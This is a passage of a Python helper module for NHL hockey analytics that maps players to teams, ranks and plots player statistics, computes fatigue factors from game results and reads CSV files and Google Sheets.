'WSH'\n\t\tnew_team['ANDREAS_ATHANASIOU'] = 'EDM'\n\t\tnew_team['SAM_GAGNER'] = 'DET'\n\t\tnew_team['TYLER_ENNIS'] = 'EDM'\n\t\tnew_team['EVAN_RODRIGUES'] = 'PIT'\n\t\tnew_team['CONOR_SHEARY'] = 'PIT'\n\t\tnew_team['DOMINIK_KAHUN'] = 'BUF'\n\t\tnew_team['SONNY_MILANO'] = 'ANA'\n\t\tnew_team['DEVIN_SHORE'] = 'CBJ'\n\t\tnew_team['BARCLAY_GOODROW'] = 'TBL'\n\t\tnew_team['DANIEL_SPRONG'] = 'WSH'\n\t\tnew_team['MIKE_GREEN'] = 'EDM'\n\t\tnew_team['CHRISTIAN_DJOOS'] = 'ANA'\n\t\tnew_team['NICK_COUSINS'] = 'VGK'\n\t\tnew_team['MATTHEW_PECA'] = 'OTT'\n\t\tnew_team['ZACH_BOGOSIAN'] = 'TBL'\n\t\tnew_team['CODY_GOLOUBEF'] = 'DET'\n\t\tnew_team['ANDREW_AGOZZINO'] = 'ANA'\n\t\tnew_team['MATT_IRWIN'] = 'ANA'\n\t\tnew_team['DEREK_FORBORT'] = 'LAK'\n\t\tnew_team['BRADY_SKJEI'] = 'CAR'\n\t\tnew_team['ERIK_GUSTAFSSON'] = 'CGY'\n\t\tnew_team['ROBIN_LEHNER'] ='VGK'\n\t\tnew_team['ONDREJ_KASE'] = 'BOS'\n\t\tnew_team['CALLE_ROSEN'] = 'TOR'\n\t\tnew_team['DAVID_BACKES'] = 'ANA'\n\t\tnew_team['DMYTRO_TIMASHOV'] = 'DET'\n\t\tnew_team['LOUIS_DOMINGUE'] = 'VAN'\n\t\tnew_team['MICHAEL_HUTCHINSON'] = 'COL'\n\t\tnew_team['BRANDON_DAVIDSON'] = 'SJS'\n\t\tnew_team['MALCOLM_SUBBAN'] = 'CHI'\n\t\tnew_team['KORBINIAN_HOLZER'] = 'NSH'\n\n\t\tteam_id = raw_team_str\n\t\t# Make sure players have been added to their new clubs. If not, set an error.\n\t\tteam_id_arr = (team_id.replace(' ','').split(','))\n\t\tif len(team_id_arr) > 1:\n\t\t\tif player_id not in new_team.keys():\n\t\t\t\t#raise ValueError('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id)\n\t\t\t\tprint('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id + '. Using team ' + team_id_arr[0] + ' for analysis.')\n\t\t\t\tteam_id = team_id_arr[0]\n\t\t\t\t\n\t\t\tif len(team_id_arr) > 2:\n\t\t\t\tif player_id not in manually_checked_players:\n\t\t\t\t\t#raise ValueError('Player ' + player_id + ' (' + str(raw_team_str) + ') changed club more than once. Please add to \"manually_checked_players\" to continue.')\n\t\t\t\t\tprint('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id + '. Using team ' + team_id_arr[0] + ' for analysis.')\n\t\t\t\t\tteam_id = team_id_arr[0]\n\n\t\tif team_id == 'L.A':\n\t\t\tteam_id = 'LAK'\n\t\telif team_id == 'N.J':\n\t\t\tteam_id = 'NJD'\n\t\telif team_id == 'S.J':\n\t\t\tteam_id = 'SJS'\n\t\telif team_id == 'T.B':\n\t\t\tteam_id = 'TBL'\t\t\n\t\telif team_id == 'PHX':\n\t\t\tteam_id = 'ARI'\n\n\t\tif player_id in set(new_team.keys()):\n\t\t\tteam_id = new_team[player_id]\n\n\t\t# Weird special case due to misspelled team_id at NST-data.\n\t\tif team_id == 'PTI':\n\t\t\tteam_id = 'PIT' \n\n\t\tif team_id not in ACTIVE_TEAMS:\n\t\t\traise ValueError('Team-ID for player ' + player_id + ' is incorrect (\"' + team_id + '\")')\n\n\treturn [player_id,team_id]\n\ndef print_sorted_list(db,attributes,operation=None,_filter=None,print_list_length=50,scale_factor=1,high_to_low=True,do_print=True,normalize=False):\n\n\tif _filter == None:\n\t\t_filter['toi'] = 0\n\t\t_filter['position'] = ['F','D']\n\t\t_filter['additional_players'] = []\n\t\t_filter['team'] = None\n\t\t_filter['playform'] = STAT_ES\n\t\t\n\toutput = {}\n\tadded_players = set()\n\tsorted_list,data_list = [],[]\n\tfor skater_id in db.keys():\n\t\tskater = db[skater_id]\n\t\t#if (skater.ind['toi'][_filter['playform']] >= 60*_filter['toi'] and skater.bio['position'] in _filter['position']) or (skater_id in _filter['additional_players']):\n\t\tif (skater.ind['toi'][_filter['playform']] >= 60*_filter['toi'] and skater.bio['position'] in _filter['position']):\n\t\t\tif len(attributes) > 1:\n\t\t\t\tif attributes[0] == 'ranking':\n\t\t\t\t\tval = skater.get_attribute(attributes[1],playform_index='ranking')\n\t\t\t\telse:\n\t\t\t\t\tval_a = skater.get_attribute(attributes[0],_filter['playform'])\n\t\t\t\t\tval_b = skater.get_attribute(attributes[1],_filter['playform'])\n\t\t\t\t\tval = operation(val_a,val_b)\n\t\t\telse:\n\t\t\t\tval = skater.get_attribute(attributes[0],_filter['playform'])\n\t\t\tval *= scale_factor\n\t\t\tif _filter['team'] == None:\n\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\tdata_list.append(val)\n\t\t\t\tadded_players.add(skater_id)\n\t\t\telse:\n\t\t\t\tif skater.bio['team_id'] in _filter['team']:\n\t\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\t\tdata_list.append(val)\n\t\t\t\t\tadded_players.add(skater_id)\n\t\t\tif (skater_id in _filter['additional_players']) and (skater_id not in added_players):\n\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\tdata_list.append(val)\n\n\t# This is not very nice.\n\tsorted_list.sort(reverse=high_to_low)\n\tdata_list.sort(reverse=high_to_low)\n\n\toutput['mu'] = np.mean(data_list)\n\toutput['sigma'] = np.std(data_list)\n\toutput['list'] = sorted_list\n\toutput['data'] = data_list\n\tif normalize == True:\n\t\tnorm_factor = 1/np.max(data_list)\n\telse:\n\t\tnorm_factor = 1\n\tif do_print == True:\n\t\tprint('{0}. Scale factor={1:.0f}. Min.TOI={2:.0f}. Total players={3:.0f}. Average value={4:.2f}. Stdev={5:.2f}.'.format(attributes,scale_factor,_filter['toi'],len(sorted_list),output['mu'],output['sigma']))\n\t\tranking = 0\n\t\tfor pair in sorted_list:\n\t\t\tranking += 1\n\t\t\tskater_id = pair[1]\n\t\t\tskater = db[skater_id]\n\t\t\tif ranking <= print_list_length or skater_id in _filter['additional_players']:\n\t\t\t\tif attributes[0] == 'ranking':\n\t\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma. TOI: {5:.1f} min/gp)'.format(ranking,skater.bio['name'],skater.bio['team_id'],val,(val-output['mu'])/output['sigma'],(skater.get_attribute('toi')/60)/skater.get_attribute('gp')))\n\t\t\t\t\t#print(' Ranking: {0:.0f}'.format(skater.get_attribute(attributes[1],'ranking')))\n\t\t\t\telse:\n\t\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma)'.format(ranking,skater.bio['name'],skater.bio['team_id'],val,(val-output['mu'])/output['sigma']))\n\t\t\t\t\tprint(' TOI: {0:.1f} minutes'.format(skater.get_toi(_filter['playform'])/60))\n\t\t\t\t\tfor attribute in attributes:\n\t\t\t\t\t\tprint(' {0}: {1:.2f}'.format(attribute,scale_factor*skater.get_attribute(attribute,_filter['playform'])))\n\treturn output\n\ndef print_sorted_list_goalie(db,attribute,_filter,print_list_length=10,scale_factor=1,high_to_low=True,do_print=True,normalize=False):\n\tif _filter == None:\n\t\t_filter['toi'] = 0\n\t\t_filter['additional_players'] = []\n\t\t_filter['team'] = None\n\toutput = {}\n\tadded_players = set()\n\tsorted_list,data_list = [],[]\n\tfor goalie_id in db.keys():\n\t\tgoalie = db[goalie_id]\n\t\tif goalie.get_attribute('toi') >= 60*_filter['toi'] or goalie_id in _filter['additional_players']:\n\t\t\tval = goalie.get_attribute(attribute) * scale_factor\n\t\t\tif _filter['team'] == None:\n\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\tdata_list.append(val)\n\t\t\t\tadded_players.add(goalie_id)\n\t\t\telse:\n\t\t\t\tif goalie.get_attribute('team_id') in _filter['team']:\n\t\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\t\tdata_list.append(val)\n\t\t\t\t\tadded_players.add(goalie_id)\n\t\t\tif (goalie_id in _filter['additional_players']) and (goalie_id not in added_players):\n\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\tdata_list.append(val)\n\n\t# This is not very nice.\n\tsorted_list.sort(reverse=high_to_low)\n\tdata_list.sort(reverse=high_to_low)\n\toutput['mu'] = np.mean(data_list)\n\toutput['sigma'] = np.std(data_list)\n\toutput['list'] = sorted_list\n\toutput['data'] = data_list\n\tif normalize == True:\n\t\tnorm_factor = 1/np.max(data_list)\n\telse:\n\t\tnorm_factor = 1\n\tif do_print == True:\n\t\tprint('{0}. Scale factor={1:.0f}. Min.TOI={2:.0f}. Total players={3:.0f}. Average value={4:.2f}.'.format(attribute,scale_factor,_filter['toi'],len(sorted_list),output['mu']))\n\t\tranking = 0\n\t\tfor pair in sorted_list:\n\t\t\tranking += 1\n\t\t\tgoalie_id = pair[1]\n\t\t\tgoalie = db[goalie_id]\n\t\t\tif ranking <= print_list_length or goalie_id in _filter['additional_players']:\n\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma)'.format(ranking,goalie.get_attribute('name'),goalie.get_attribute('team_id'),val,(val-output['mu'])/output['sigma']))\n\treturn output\n\ndef get_pair_index(pair_list,key):\n\tfor idx,pair in enumerate(pair_list):\n\t\tval = pair[0]\n\t\tname = pair[1]\n\t\tif name == key:\n\t\t\treturn [idx,val]\n\traise ValueError('No key ' + key + ' found in list')\n\ndef get_sigma_difference(db,player_id,attribute,playform=STAT_ES):\n\top = print_sorted_list(db,[attribute],playform,operation=None,toi_filter=200,position_filter=['F','D'],team=None,print_list_length=50,scale_factor=1,high_to_low=True,do_print=False,normalize=False)\n\tplayer = db[player_id]\n\tplayer_val = player.get_attribute(attribute,playform)\n\treturn (player_val-op['mu'])/op['sigma']\n\n\n\ndef plot_player_cards(ax,axes_info,p_db,player_ids,_filter):\n\t# Init\n\tgen_x,gen_y,spec_x,spec_y,markers = [],[],[],[],[]\n\toutput = {}\n\toutput['pair_list'], output['data_list'] = [],[]\n\tydata_only = False\n\ttmp_index = 0\n\t\n\t# Set up additional axes information\n\tif axes_info['x']['attribute'] == None:\n\t\taxes_info['fit_data'] = False\n\t\tydata_only = True\n\t\taxes_info['x']['label'] = 'Player no.'\n\t\taxes_info['x']['invert'] = False\n\t\n\t# Set up color/markers\n\tcolors = ['c','m','g','r','b'] # black and yellow are protected colors.\n\tforms = ['o','v','s','*','x','p','d']\n\tfor form in forms:\n\t\tfor color in colors:\n\t\t\tmarkers.append(str(form + color))\n\n\t# Error check\n\tif len(player_ids) > len(markers):\n\t\twarnings.warn('Too many players to plot, text output only')\n\t\tdo_plots = False\n\telse:\n\t\tdo_plots = True\n\t# Plot all data for league\n\tfor tmp_id in p_db:\n\t\ttmp_player = p_db[tmp_id]\n\t\tif (tmp_player.get_toi() > _filter['toi']*60) and (tmp_player.get_attribute('position') in _filter['position']):\n\t\t\tif ydata_only == True:\n\t\t\t\tgen_x.append(tmp_index)\n\t\t\t\ttmp_index += 1\n\t\t\telse:\n\t\t\t\tgen_x.append(axes_info['x']['scale']*tmp_player.get_attribute(axes_info['x']['attribute']))\n\t\t\tgen_y.append(axes_info['y']['scale']*tmp_player.get_attribute(axes_info['y']['attribute']))\n\tplt.scatter(gen_x,gen_y,c='k',marker='.')\n\n\t# Add mean value.\n\tplt.scatter(np.mean(gen_x),np.mean(gen_y),c='y',marker='s',label='NHL mean')\n\t\n\t# Fit linear model to (scatter) data.\n\tif axes_info['fit_data'] == True:\n\t\tfit = np.polyfit(gen_x, gen_y, 1)\n\t\tfit_fn = np.poly1d(fit)\n\t\tk = round(fit[0],4)\n\t\toutput['fit'] = fit\n\t\toutput['fit_fn'] = fit_fn\n\t\tx_val = range(int(np.min(ax.get_xlim())),int(np.max(ax.get_xlim())))\n\t\tplt.plot(x_val,fit_fn(x_val),'y--',label='Data fit (k=' + str(k) + ')')\n\t\n\t# Add 50% threshold.\n\tif axes_info['add_threshold'] == True:\n\t\tstart = int(np.min([np.min(ax.get_xlim()),np.min(ax.get_ylim())]))\n\t\tstop = int(np.max([np.max(ax.get_xlim()),np.max(ax.get_ylim())]))\n\t\tplt.plot(range(start,stop),range(start,stop),'k--',label='50% threshold')\n\n\t# Plot data for the specified players.\n\tmarker_idx = 0\n\tfor i, player_id in enumerate(player_ids):\n\t\tplayer = p_db[player_id]\n\t\tif player.get_toi() < _filter['toi']*60:\n\t\t\twarnings.warn('Player ' + player_id + ' has played less than ' + str(_filter['toi']) + ' minutes even strength (' + str(int(player.get_toi()/60)) + '). Data not included in plot(s).')\n\t\telse:\n\t\t\tif (player.get_attribute('position') in _filter['position']):\n\t\t\t\tif do_plots == True:\n\t\t\t\t\tcurrent_marker = markers[marker_idx]\n\t\t\t\tif (ydata_only == True) and (do_plots == True):\n\t\t\t\t\tplt.scatter(i,axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute']),c=current_marker[1],marker=current_marker[0],label=player_id)\n\t\t\t\telse:\n\t\t\t\t\tif axes_info['fit_data'] == True:\n\t\t\t\t\t\tx_val = axes_info['x']['scale']*player.get_attribute(axes_info['x']['attribute'])\n\t\t\t\t\t\ty_val = axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute'])\n\t\t\t\t\t\ty_est = fit_fn(x_val)\n\t\t\t\t\t\ty_diff = y_val - y_est\n\t\t\t\t\t\toutput['pair_list'].append((y_diff,player_id))\n\t\t\t\t\t\toutput['data_list'].append(y_diff)\n\t\t\t\t\t\tif y_diff > 0:\n\t\t\t\t\t\t\tsign = '+'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsign = ''\n\t\t\t\t\t\tlbl_val_str = ' (' + sign + str(int(100*y_diff/y_est)) + '%)'\n\t\t\t\t\telse:\n\t\t\t\t\t\tlbl_val_str = ''\n\t\t\t\t\tif do_plots == True:\n\t\t\t\t\t\tplt.scatter(axes_info['x']['scale']*player.get_attribute(axes_info['x']['attribute']),axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute']),c=current_marker[1],marker=current_marker[0],label=player_id+lbl_val_str)\n\t\t\t\tmarker_idx += 1\n\t\n\t# Invert axis for readability.\n\tif axes_info['x']['invert'] == True:\n\t\tax.invert_xaxis() \n\tif axes_info['y']['invert'] == True:\n\t\tax.invert_yaxis()\n\n\t# Plot stuff\n\tplt.xlabel(axes_info['x']['label'])\n\tplt.ylabel(axes_info['y']['label'])\n\tfont_size = np.min([140/len(player_ids),9])\n\tax.legend(loc='upper left', bbox_to_anchor=(1.0, 1.03), ncol=1, fontsize=font_size)\n\tplt.subplots_adjust(left=0.05,bottom=0.07,top=0.95,right=0.82,hspace=0.3)\n\tplt.grid(True)\n\n\toutput['pair_list'].sort(reverse=True)\n\treturn [plt,ax,output]\n\n\n\ndef weighted_sum(lst,w_lst):\n\top = 0\n\tif len(lst) != len(w_lst):\n\t\traise ValueError('Incompatible lengths')\n\tfor i in range(len(lst)):\n\t\top += w_lst[i]*lst[i]\n\n\treturn op\n\ndef get_from_distribution(val_dict,attribute,normalize=False):\n\t# ct_on_ice_db[skater_id] = [isf_per_time,sh_pcg,pt_per_time,pd_per_time,off_per_time,def_per_time]\n\t\n\tsum_value = 1.0\n\tif attribute == 'isf_per_time':\t\t\n\t\tindex = 0\n\telif attribute == 'sh_pcg':\n\t\tindex = 1\n\telif attribute == 'pt_per_time':\n\t\tindex = 2\n\telif attribute == 'pd_per_time':\n\t\tindex = 3\n\telif attribute == 'off_per_time':\n\t\tindex = 4\n\telif attribute == 'def_per_time':\n\t\tindex = 5\n\telse:\n\t\traise ValueError('Unknown attribute ' + attribute)\n\tif normalize == True:\n\t\tvals = []\n\t\tfor p_id in val_dict.keys():\n\t\t\tplayer_values = val_dict[p_id]\n\t\t\tvals.append(player_values[index])\n\t\tsum_value = np.sum(vals)\n\twhile True:\n\t\tfor p_id in set(val_dict.keys()): # set for randomizing purposes\n\t\t\tplayer_values = val_dict[p_id]\n\t\t\tif sum_value == 0: # special case\n\t\t\t\treturn p_id\n\t\t\tif random.uniform(0,1) <= (player_values[index]/sum_value):\n\t\t\t\treturn p_id\n\ndef acces_gsheet(name_of_ws,credential_path='creds.json'):\n\t# Open/access g-Sheet\n\t#name_of_ws = \"SharksData_Public\"\n\tcredential_path = 'creds.json' \t\t\t# Old version\n\tprint('Authentication Google Sheet \"' + name_of_ws +'\"...')\n\tjson_key = json.load(open(credential_path)) # json credentials you downloaded earlier\n\tscope = ['https://spreadsheets.google.com/feeds',\n\t 'https://www.googleapis.com/auth/drive']\n\tcredentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'].encode(), scope) # get email and key from creds\n\tg_file = gspread.authorize(credentials) # authenticate with Google\n\tprint('Authentication done')\n\tprint('Opening worksheet...')\n\tg_wb = g_file.open(name_of_ws) # Open Google WorkBook\n\treturn g_wb\n\ndef get_alpha(pos=None):\n\t# translates column index (1,2,3) to column name ('A','B','C'). \n\talpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\tcombined_alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\tfor f_letter in alpha:\n\t\tfor s_letter in alpha:\n\t\t\tcombined_alpha.append(f_letter + s_letter)\n\n\tif pos == None:\n\t\treturn combined_alpha\n\telse:\n\t\treturn combined_alpha[pos-1]\n\ndef evaluate_combination(s_db,player_ids,attributes=['estimated_off_per_60','estimated_def_per_60','pd_diff_per_60']):\n\tif isinstance(player_ids, list) == False:\n\t\traise ValueError('Uncompatible types. Input must be a (list-of) list(s).')\n\telse:\n\t\tif isinstance(player_ids[0],list):\n\t\t\t# List of line combinations\n\t\t\tprint('@TODO')\n\t\telse:\n\t\t\tdata_values = len(attributes)*[0]\n\t\t\tfor player_id in player_ids:\n\t\t\t\tskater = s_db[player_id]\n\t\t\t\tfor i,attribute in enumerate(attributes):\n\t\t\t\t\tdata_values[i] += skater.get_attribute(attribute)\n\t\t\tfor i,attribute in enumerate(attributes):\n\t\t\t\tprint(str(player_ids) + ': ' + attribute + ': ' + str(data_values[i]))\n\treturn data_values\t\t\n\ndef print_player_from_team(player_db,team_id,position=[]):\n\tif position == []:\n\t\tposition = ['G','D','F']\n\tfor player_id in player_db:\n\t\tplayer = get_skater(player_db,player_id)\n\t\tif (player.bio['team_id'] == team_id) and (player.bio['position'] in position):\n\t\t\tprint(player_id)\n\ndef get_sorted_db(simulation_param,value_key,cut_off=None,toi_filter=0,position_filter=None,best_first=True):\n\t\"\"\"\n\tReturn the cut_off best players in a certain category. Can filter out players based on time-on-ice [minutes]\n\t\"\"\"\n\tlst = []\n\tsplit_key = value_key.split('_')\n\tsplit_val_key = ''\n\tfor val in split_key[1:]:\n\t\tsplit_val_key += val + '_'\n\tsplit_val_key = split_val_key[:-1]\n\tif position_filter == None:\n\t\tposition_filter = ['G','D','F']\n\tfor skater_id in simulation_param['databases']['skater_db'].keys():\n\t\tskater = get_skater(simulation_param['databases']['skater_db'],skater_id)\n\t\tif (skater.es['toi']/60 >= toi_filter) and (skater.bio['position'] in position_filter):\n\t\t\tif split_key[0] == 'es':\n\t\t\t\tlst.append((skater.es[split_val_key],skater_id))\n\t\t\telif split_key[0] == 'on_ice':\n\t\t\t\tlst.append((skater.on_ice[split_val_key],skater_id))\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown split-key \"' + value_key.split('_')[0] + '\"')\n\tlst.sort(reverse=best_first)\n\tif cut_off == None:\n\t\treturn lst\n\telse:\n\t\treturn lst[0:cut_off]\n\n\ndef create_player_list(s_db,_filter):\n\tlist_of_players = []\n\tfor skater_id in ACTIVE_SKATERS:\n\t\tskater = get_skater(s_db,skater_id)\n\t\tplayer_ok = True\n\t\tfor attribute in _filter:\n\t\t\tif isinstance(_filter[attribute],str) == True:\n\t\t\t\tif skater.get_attribute(attribute) != _filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\t\t\telif _filter[attribute] > 0:\n\t\t\t\tif skater.get_attribute(attribute) < _filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\t\t\telif _filter[attribute] < 0:\n\t\t\t\tif skater.get_attribute(attribute) > -1*_filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\n\t\tif player_ok:\n\t\t\tlist_of_players.append(skater_id)\n\t\n\treturn list_of_players\n\ndef get_probability(values,idx=0):\n\tif isinstance(values, list) == False:\n\t\traise ValueError('Uncompatible types. Input must be a list.')\n\telse:\n\t\tval = values[idx]\n\t\treturn val/sum(values)\n\ndef get_skater_values(skater_db):\n\tvalues_dict = defaultdict(list)\n\tfor skater_id in ACTIVE_SKATERS:\n\t\tskater = skater_db[skater_id]\n\t\tvalues_dict['estimated_off_per_60'].append(skater.on_ice['estimated_off_per_60'])\n\t\tvalues_dict['estimated_def_per_60'].append(skater.on_ice['estimated_def_per_60'])\n\t\tvalues_dict['estimated_off_pcg'].append(skater.on_ice['estimated_off_pcg'])\n\t\tvalues_dict['estimated_off_diff'].append(skater.on_ice['estimated_off_diff'])\n\t\tvalues_dict['primary_points_per_60'].append(skater.ind['primary_points_per_60'][0])\n\t\tvalues_dict['goal_scoring_rating'].append(skater.ind['goal_scoring_rating'][0])\n\treturn values_dict\n\ndef get_team_values(team_db):\n\tvalues_dict = defaultdict(list)\n\tfor team_id in ACTIVE_TEAMS:\n\t\tteam = team_db[team_id]\n\t\tvalues_dict['p_pcg'].append(team.p_pcg)\n\t\tvalues_dict['gf_pcg'].append(team.gf_pcg)\n\t\tvalues_dict['sf_pcg'].append(team.sf_pcg)\n\t\tvalues_dict['cf_pcg'].append(team.cf_pcg)\n\t\tvalues_dict['ff_pcg'].append(team.ff_pcg)\n\t\tvalues_dict['xgf_pcg'].append(team.xgf_pcg)\n\t\tvalues_dict['scf_pcg'].append(team.scf_pcg)\n\t\tvalues_dict['hdcf_pcg'].append(team.hdcf_pcg)\n\t\tvalues_dict['sv_pcg'].append(team.sv_pcg)\n\t\tvalues_dict['pdo'].append(team.pdo)\n\t\tvalues_dict['hits'].append(team.exp_data['hits'])\n\t\tvalues_dict['hits_taken'].append(team.exp_data['hits_taken'])\n\t\tvalues_dict['hits_diff'].append(team.exp_data['hits_diff'])\n\t\tvalues_dict['estimated_off_pcg'].append(team.exp_data['estimated_off_pcg'])\n\t\tvalues_dict['in_season_rating'].append(team.exp_data['in_season_rating'])\n\treturn values_dict\n\ndef get_rank(value,lst):\n\t'''\n\tReturns the rank of the value in the list\n\t'''\n\tlst.sort(reverse=False)\n\trank = 1\n\tfor lst_val in lst:\n\t\tif lst_val == value:\n\t\t\treturn rank\n\t\trank += 1\n\tif rank > len(lst):\n\t\traise ValueError('Could not find value ' + str(value) + ' in the list.')\n\ndef generate_fatigue_factors(csv_path='Data/nhl_result_from_2018.csv'):\n\tfatigue_factors = {}\n\tfor team_id in ACTIVE_TEAMS:\n\t\tteam = get_long_name(team_id)\n\t\tfatigue_factors[team_id] = {}\n\t\top_days = {}\n\t\top_days[0],op_days[1],op_days[2] = defaultdict(int),defaultdict(int),defaultdict(int)\n\t\top_all = defaultdict(int)\n\t\tall_gf, all_ga, all_p, all_p_total = 0,0,0,0\n\t\tht_gf_idx = 2\n\t\tat_gf_idx = 4\n\t\tot_idx = 5\n\t\tprev_date = -1\n\t\twith open(csv_path,'rt') as f:\n\t\t\t\treader = csv.reader(f, delimiter=',')\n\t\t\t\tfor row in reader:\n\t\t\t\t\tif row[1] != 'Date':\n\t\t\t\t\t\tht = row[1]\n\t\t\t\t\t\tat = row[3]\n\t\t\t\t\t\tif (ht == team) or (at == team):\n\t\t\t\t\t\t\tif team == ht:\n\t\t\t\t\t\t\t\tgf = int(row[ht_gf_idx])\n\t\t\t\t\t\t\t\tga = int(row[at_gf_idx])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tgf = int(row[at_gf_idx])\n\t\t\t\t\t\t\t\tga = int(row[ht_gf_idx])\n\t\t\t\t\t\t\tthis_date = row[0]\n\t\t\t\t\t\t\tif prev_date != -1:\n\t\t\t\t\t\t\t\tdays_since_last_game = get_delta_days(prev_date,this_date) - 1\n\t\t\t\t\t\t\t\tif days_since_last_game >= 2:\n\t\t\t\t\t\t\t\t\tdays_since_last_game = 2\n\t\t\t\t\t\t\t\tif gf > ga:\n\t\t\t\t\t\t\t\t\tp = 2\n\t\t\t\t\t\t\t\telif row[ot_idx] != '':\n\t\t\t\t\t\t\t\t\tp = 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tp = 0\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['games_played'] += 1\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['gf'] += gf\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['ga'] += ga\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['p'] += p\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['p_total'] += 2\n\t\t\t\t\t\t\t\top_all['gf'] += gf\n\t\t\t\t\t\t\t\top_all['ga'] += ga\n\t\t\t\t\t\t\t\top_all['p'] += p\n\t\t\t\t\t\t\t\top_all['p_total'] += 2\n\t\t\t\t\t\t\tprev_date = this_date\n\n\t\ttotal_gf_pcg = get_probability([op_all['gf'],op_all['ga']])\n\t\ttotal_p_pcg = op_all['p']/op_all['p_total']\n\t\tfor i in range(3):\n\t\t\tdays_gf_pcg = get_probability([op_days[i]['gf'],op_days[i]['ga']])\n\t\t\tdays_p_pcg = op_days[i]['p']/op_days[i]['p_total']\n\t\t\top_days[i]['gf_pcg'] = days_gf_pcg\n\t\t\top_days[i]['gf_pcg_rel'] = days_gf_pcg/total_gf_pcg\n\t\t\top_days[i]['p_pcg'] = days_p_pcg\n\t\t\top_days[i]['p_pcg_rel'] = days_p_pcg/total_p_pcg\n\t\tfatigue_factors[team_id]['per_days_rested'] = op_days\n\t\tfatigue_factors[team_id]['total'] = op_all\n\treturn fatigue_factors\n\ndef get_fatigue_factor(fatigue_factors,team_id,days_rested=-1):\n\tif days_rested == -1:\n\t\treturn fatigue_factors[team_id]\n\telse:\n\t\tif days_rested > 2:\n\t\t\twarnings.warn('2 days of rest is maximum. Returning fatigue factor for 2 rest days (' + str(days_rested) + ' selected).')\n\t\t\tdays_rested = 2\n\t\treturn fatigue_factors[team_id]['per_days_rested'][days_rested]['p_pcg_rel']\n\ndef generate_starting_goalies():\n\tstarting_goalies_dict = generate_all_teams_dict(return_type=None)\n\treturn starting_goalies_dict\n\ndef handler(signum,frame):\n\t#print('Connection timed out')\n\traise Exception(\"Connection timed out\")\n\ndef get_k_factor(x_array,y_array,do_plot=False):\n\tfit = np.polyfit(x_array, y_array, 1)\n\tfit_fn = np.poly1d(fit)\n\tk = round(fit[0],4)\n\tif do_plot == True:\n\t\tplt.figure(1)\n\t\tx_val = np.linspace(1,31,31)\n\t\tplt.scatter(x_array,y_array,c='k',marker='.')\n\t\tplt.plot(x_val,fit_fn(x_val),'y--',label='Data fit (k=' + str(k) + ')')\n\t\tplt.show()\n\treturn k\n\ndef cond_bp():\n\traise ValueError('Conditional breakpoint')\n\ndef backup_data_dir(src,dst):\n\t'''\n\tBackup all csv-files from the source folder to the destination folder\n\t'''\n\tlist_of_all = os.listdir(src)\n\tlist_of_files = []\n\tfor filename in list_of_all:\n\t\tfilepath = os.path.join(src,filename)\n\t\tif os.path.splitext(filepath)[1] == '.csv':\n\t\t\tcopyfile(filepath,os.path.join(dst,filename))\n\ndef generic_csv_reader(csv_file_path,dict_key_attribute='name',output_attributes=False):\n\t'''\n\tAssuming first line is the headers.\n\tReturns an dict with accoridng to input dict_key;\n \t\toutput[dict_key] = {}\n \t\toutput[dict_key][header_1] = value_1\n \t\toutput[dict_key][header_2] = value_2\n \t\t...\n \t\toutput[dict_key][header_n] = value_n\n\t'''\n\toutput = {}\n\tattributes = []\n\twith open(csv_file_path,'rt') as f:\n\t\treader = csv.reader(f, delimiter=',')\n\t\tfirst_row = True\n\t\tfor row in reader:\n\t\t\tif first_row == True:\n\t\t\t\tfirst_row = False\n\t\t\t\t# Extract headers\n\t\t\t\t'''\n\t\t\t\tfor value in row:\n\t\t\t\t\tattributes.append(str(value).lower())\n\t\t\t\t'''\n\t\t\t\tattributes = row\n\t\t\t\tif output_attributes == True:\n\t\t\t\t\toutput['attributes'] = attributes\n\t\t\t\tif dict_key_attribute not in attributes:\n\t\t\t\t\traise ValueError('Could not find dictionary key \"' + dict_key_attribute + '\" in attributes: ' + str(attributes))\n\t\t\t\tdict_key_index = attributes.index(dict_key_attribute)\n\t\t\t\t#print(attributes)\n\t\t\telse:\n\t\t\t\t# Add data to dict\n\t\t\t\tdict_key = row[dict_key_index]\n\t\t\t\toutput[dict_key] = {}\n\t\t\t\tfor i,value in enumerate(row):\n\t\t\t\t\tattribute = attributes[i]\n\t\t\t\t\toutput[dict_key][attribute] = value\n\treturn output","repo_name":"TobiasSolbeckar/nhl","sub_path":"nhl_helpers.py","file_name":"nhl_helpers.py","file_ext":"py","file_size_in_byte":37367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18261015131","text":"\n# Here is the pseudocode:\n\n# 1. For each line of the file, read the line with a CSV reader and do the following\n# \t1. if the line starts with @\n# \t\t1. if the value of the first column is @HD\n# 